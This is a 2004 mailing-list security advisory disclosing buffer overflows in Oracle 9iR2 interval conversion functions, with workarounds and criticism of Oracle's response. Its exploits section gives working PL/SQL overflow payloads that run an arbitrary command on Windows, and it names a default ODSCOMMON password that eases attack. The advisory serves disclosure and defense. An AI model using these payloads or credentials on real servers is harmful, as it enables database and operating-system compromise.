Oracle Database 9ir2 Interval Conversion Functions Buffer Overflow

• Previous message: Darryl J Roberts: "Re: MS Exchange 5.5 NDRs (from MyDoom)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date:         Thu, 5 Feb 2004 17:20:15 -0300
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

Security Advisory

Name: Oracle Database 9ir2 Interval Conversion Functions Buffer Overflow.
System Affected : Oracle Database 9ir2, previous versions could be affected too.
Severity : High
Remote exploitable : Yes
Author: Cesar Cerrudo.
Date: 02/05/04
Advisory Number: CC020401


Legal Notice:

This Advisory is Copyright (c) 2003 Cesar Cerrudo.
You may distribute it unmodified and for free. You may NOT modify it and distribute it or distribute
parts of it without the author's written permission. You may NOT use it for commercial intentions
(this means include it in vulnerabilities databases, vulnerabilities scanners, any paid service,
etc.) without the author's written permission. You are free to use Oracle details for commercial intentions.


Disclaimer:

The information in this advisory is believed to be true though it may be false.
The opinions expressed in this advisory are my own and not of any company. The usual standard
disclaimer applies, especially the fact that Cesar Cerrudo is not liable for any damages caused
by direct or indirect use of the information or functionality provided by this advisory.
Cesar Cerrudo bears no responsibility for content or misuse of this advisory or any derivatives thereof.



!!!!!!!!!!!ALERT!!!!!!!!!!!:

Oracle was contacted about these vulnerabilities, but their Security Response Team is one of the worst that
i have deal with, they don't care about security and they don't even follow OISafety rules(Oracle is a member).
Because this reason we only have told to Oracle about just a couple of bugs, i think i won't contact them anymore,
or maybe if i get a letter from Larry Ellison asking for apologies...:).
Anyways if Oracle would spend more money on security than in marketing saying that their products are unbreakable
everything would be different. Right now Oracle database server and other Oracle products are some kind of backdoor.
These vulnerabilities are just only a bit of +60 that we have identified (yes more than 60 issues and
most of these issues can be exploited by any low privileged user to take complete control over the
database and probably OS, also for some of them there aren't any workarounds). If you are running Oracle i
recomend you to start praying to not being hacked and to start complaining to Oracle to improve the quality of
their products and to release patches.

BTW: if someone from Oracle dares to say that i'm not telling the true, then probably i will release all the holes
information to shut their mouths.

Some workaround to protect your Oracle servers until maybe next year when Oracle probably could fix their buggy
database server:

-Check packages permissions and remove public permission, set minimal permissions
that fit your needs.
-Check Directory Objects permissions and remove public permission, set minimal permissions
that fit your need, remove Directory Objecs if not used.
-Restrict users to execute directly PL/SQL statements over the server.
-Periodically audit users permissions on all database objects.
-Lock users that aren't used.
-Change default passwords.
If you want automation, i really like AppDetective for Oracle:
http://www.appsecinc.com/products/appdetective/oracle/


Overview:

Oracle Database Server is one of the most used database servers in the world, it was marketed
as being unbreakable and many people thinks that is one of the most secure database server in
the market. Larry Ellison (Oracle CEO) says that Oracle is used by NSA, CIA, russian intelligence, goverments, etc.
(www.commonwealthclub.org/archive/96/96-03ellison-qa.html), so it must be really secure!!!
Oracle Database Server provides two functions that can be used with PL/SQL to convert numbers
to date/time intervals, these functions have buffer overflow vulnerebilities.



Details:

When any of these conversion funcions are called with a long string as a second
parameter a buffer overflow occurs.

To reproduce the overflow execute the next PL/SQL:

SELECT NUMTOYMINTERVAL(1,'longstringhere') from dual;

SELECT NUMTODSINTERVAL(1,'longstringhere') from dual;



This vulnerability can be exploited by any Oracle Database user because access to these
functions can't be restricted.
Explotation of this vulnerability allow an attacker to execute arbitrary code, also it
can be exploited to cause DOS (Denial of service) killing Oracle server process. An attacker can
complete compromise the OS and database if Oracle is running on Windows plataform, because Oracle must
run under the local System account or under an administrative account. If Oracle is running on *nix
then only the database could be compromised because Oracle runs mostly under oracle user which has restricted
permissions.
Important!: Explotation of these vulnerabilities becomes easy if Oracle Internet Directory has
been deployed, because Oracle Internet Directory creates a database user called ODSCOMMON that
has a default password ODSCOMMON (Unbreakable???, hahaha, please take a look at this

http://igloo.its.unimelb.edu.au/Webmail/tips/msg00762.html), this password can not be changed,
so any attacker can use this user to connect to database and exploit these vunerabilities.


Full tests on Oracle database 9ir2 under Microsoft Windows 2000 Server and Linux confirm these vulnerabilities,
versions running in other OS plataforms are believed to be affected too.
Previous Oracle Database Server versions could be affected by these vulnerabilities.



Exploits:

--these exploits should work on W2K Server and WinXp, not tested on Win2003.
--run any command at the end of the string
SELECT NUMTOYMINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR' ||

chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)||chr(18)||chr(80)||chr(255)||chr(21)||chr(52)||chr(35)||chr(1

48)||chr(01)||chr(255)||chr(37)||chr(172)||chr(33)||chr(148)||chr(01)||chr(32)||'echo ARE YOU SURE? >c:\Unbreakable.txt')

FROM DUAL;

SELECT NUMTODSINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR' ||

chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)||chr(18)||chr(80)||chr(255)||chr(21)||chr(52)||chr(35)||chr(1

48)||chr(01)||chr(255)||chr(37)||chr(172)||chr(33)||chr(148)||chr(01)||chr(32)||'echo ARE YOU SURE? >c:\Unbreakable.txt')

FROM DUAL;



Vendor Fix:

Go to Oracle Metalink site, http://metalink.oracle.com


Vendor Contact:

Oracle was contacted and they released a fix without telling me nor the public anything and without issuing an alert.

-----
NTBugtraq Editor's Note:

Most viruses these days use spoofed email addresses. As such, using an Anti-Virus product which automatically notifies the perceived sender of a message it believes is infected may well cause more harm than good. Someone who did not actually send you a virus may receive the notification and scramble their support staff to find an infection which never existed in the first place. Suggest such notifications be disabled by whomever is responsible for your AV, or at least that the idea is considered.
-----

• Previous message: Darryl J Roberts: "Re: MS Exchange 5.5 NDRs (from MyDoom)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]